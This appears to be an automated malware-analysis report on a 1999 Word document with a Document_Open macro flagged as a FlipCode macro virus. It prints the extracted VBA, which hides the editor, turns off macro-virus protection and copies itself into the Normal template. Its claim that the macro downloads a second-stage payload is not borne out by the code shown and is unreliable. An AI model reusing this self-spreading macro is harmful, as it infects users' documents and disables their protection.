Office (OLE) malware analysis — malicious · 5cae36647399283f

MALICIOUS

Office (OLE)

43.0 KB Created: 1999-05-04 18:57:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ccf0c7d7dd1c4167b51afadff473cdd0 SHA-1: 99b193c89e6a14dac333497f500398e95bcd52cc SHA-256: 5cae36647399283fbadf044991010d91e5951758d2ce040dba643034cc964913

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code. The macro is heavily obfuscated, making its exact function difficult to determine, but it appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.FlipCode-1' further supports its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.FlipCode-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FlipCode-1
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 44,032 bytes but its declared streams total only 24,410 bytes — 19,622 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5381 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5381 bytes
SHA-256: `71478e211719e5a4aab09777130a6c2642303927076fa7b86f6cd88a8b1b0401`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub document_open() ' buS dnE :lacitirCbv ,".yltcerroc ti llatsni ot putes nur esaelP .dezilaitini eb ton dluoc tnemnorivne cisaB lausiV ehT" xoBgsM :)(edocbvweiv buS etavirP Application.ShowVisualBasicEditor = False ' buS dnE On Error GoTo yalav ' emaNlluF.tnemucoDevitcA=:emaNeliF sAevaS.tnemucoDevitcA nehT "tnemucoD" >< )8 ,emaN.tnemucoDevitcA(tfeL fI Options.VirusProtection = 0 ' gal txeN If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ' $van ,1 seniLtresnI.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA For lav = 1 To 14 ' tanya txeN ehs$ = "" ' )1 ,tanya ,))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(($diM & $van = $van For ruam = 1 To Len(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(lav, 1)) ' 1- petS 1 oT ))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(neL = tanya roF ehs$ = Mid$((ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(lav, 1)), ruam, 1) & ehs$ ' "" = $van Next ruam ' 41 oT 1 = gal roF NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ehs$ ' seniLfOtnuoC.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA ,1 seniLeteleD.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA nehT 0 > seniLfOtnuoC.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA fI Next lav ' eslaF = noitcetorPsuriV.snoitpO '9991 eam 0.1v edocpilf' txeN emuseR rorrE nO yalav: End Sub ' )(esolc_tnemucod buS etavirP ' Processing file: /opt/analyzer/scan_staging/37bd169a494e48c9adc8d8aad4b3deba.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8932 bytes ' Line #0: ' FuncDefn (Private Sub document_open()) ' QuoteRem 0x001C 0x0099 " buS dnE :lacitirCbv ,".yltcerroc ti llatsni ot putes nur esaelP .dezilaitini eb ton dluoc tnemnorivne cisaB lausiV ehT" xoBgsM :)(edocbvweiv buS etavirP" ' Line #1: ' LitVarSpecial (False) ' Ld Application ' MemSt ShowVisualBasicEditor ' QuoteRem 0x0029 0x0008 " buS dnE" ' Line #2: ' OnError yalav ' QuoteRem 0x0014 0x006B " emaNlluF.tnemucoDevitcA=:emaNeliF sAevaS.tnemucoDevitcA nehT "tnemucoD" >< )8 ,emaN.tnemucoDevitcA(tfeL fI" ' Line #3: ' LitDI2 0x0000 ' Ld Options ' MemSt VirusProtection ' QuoteRem 0x001C 0x0009 " gal txeN" ' Line #4: ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' LitDI2 0x0000 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0002 ' EndIf ' QuoteRem 0x00E0 0x004D " $van ,1 seniLtresnI.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA" ' Line #5: ' StartForVariable ' Ld lav ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x000E ' For ' QuoteRem 0x0012 0x000B " tanya txeN" ' Line #6: ' LitStr 0x0000 "" ' St ehs$ ' QuoteRem 0x000A 0x0067 " )1 ,tanya ,))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(($diM & $van = $van" ' Line #7: ' StartForVariable ' Ld ruam ' EndForVariable ' LitDI2 0x0001 ' Ld lav ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' FnLen ' For ' QuoteRem 0x005C 0x0065 " 1- petS 1 oT ))1 ,gal(senil.eludoMedoC.)1(metI.stneno ... (truncated)

SHA-256: 71478e211719e5a4aab09777130a6c2642303927076fa7b86f6cd88a8b1b0401

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open() ' buS dnE :lacitirCbv ,".yltcerroc ti llatsni ot putes nur esaelP .dezilaitini eb ton dluoc tnemnorivne cisaB lausiV ehT" xoBgsM :)(edocbvweiv buS etavirP
Application.ShowVisualBasicEditor = False ' buS dnE
On Error GoTo yalav ' emaNlluF.tnemucoDevitcA=:emaNeliF sAevaS.tnemucoDevitcA nehT "tnemucoD" >< )8 ,emaN.tnemucoDevitcA(tfeL fI
Options.VirusProtection = 0 ' gal txeN
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ' $van ,1 seniLtresnI.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA
For lav = 1 To 14 ' tanya txeN
ehs$ = "" ' )1 ,tanya ,))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(($diM & $van = $van
For ruam = 1 To Len(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(lav, 1)) ' 1- petS 1 oT ))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(neL = tanya roF
ehs$ = Mid$((ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(lav, 1)), ruam, 1) & ehs$ ' "" = $van
Next ruam ' 41 oT 1 = gal roF
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ehs$ ' seniLfOtnuoC.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA ,1 seniLeteleD.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA nehT 0 > seniLfOtnuoC.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA fI
Next lav ' eslaF = noitcetorPsuriV.snoitpO
'9991 eam 0.1v edocpilf' txeN emuseR rorrE nO
yalav: End Sub ' )(esolc_tnemucod buS etavirP

' Processing file: /opt/analyzer/scan_staging/37bd169a494e48c9adc8d8aad4b3deba.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8932 bytes
' Line #0:
' 	FuncDefn (Private Sub document_open())
' 	QuoteRem 0x001C 0x0099 " buS dnE :lacitirCbv ,".yltcerroc ti llatsni ot putes nur esaelP .dezilaitini eb ton dluoc tnemnorivne cisaB lausiV ehT" xoBgsM :)(edocbvweiv buS etavirP"
' Line #1:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ShowVisualBasicEditor 
' 	QuoteRem 0x0029 0x0008 " buS dnE"
' Line #2:
' 	OnError yalav 
' 	QuoteRem 0x0014 0x006B " emaNlluF.tnemucoDevitcA=:emaNeliF sAevaS.tnemucoDevitcA nehT "tnemucoD" >< )8 ,emaN.tnemucoDevitcA(tfeL fI"
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x001C 0x0009 " gal txeN"
' Line #4:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' 	EndIf 
' 	QuoteRem 0x00E0 0x004D " $van ,1 seniLtresnI.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA"
' Line #5:
' 	StartForVariable 
' 	Ld lav 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x000E 
' 	For 
' 	QuoteRem 0x0012 0x000B " tanya txeN"
' Line #6:
' 	LitStr 0x0000 ""
' 	St ehs$ 
' 	QuoteRem 0x000A 0x0067 " )1 ,tanya ,))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(($diM & $van = $van"
' Line #7:
' 	StartForVariable 
' 	Ld ruam 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld lav 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	FnLen 
' 	For 
' 	QuoteRem 0x005C 0x0065 " 1- petS 1 oT ))1 ,gal(senil.eludoMedoC.)1(metI.stneno
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.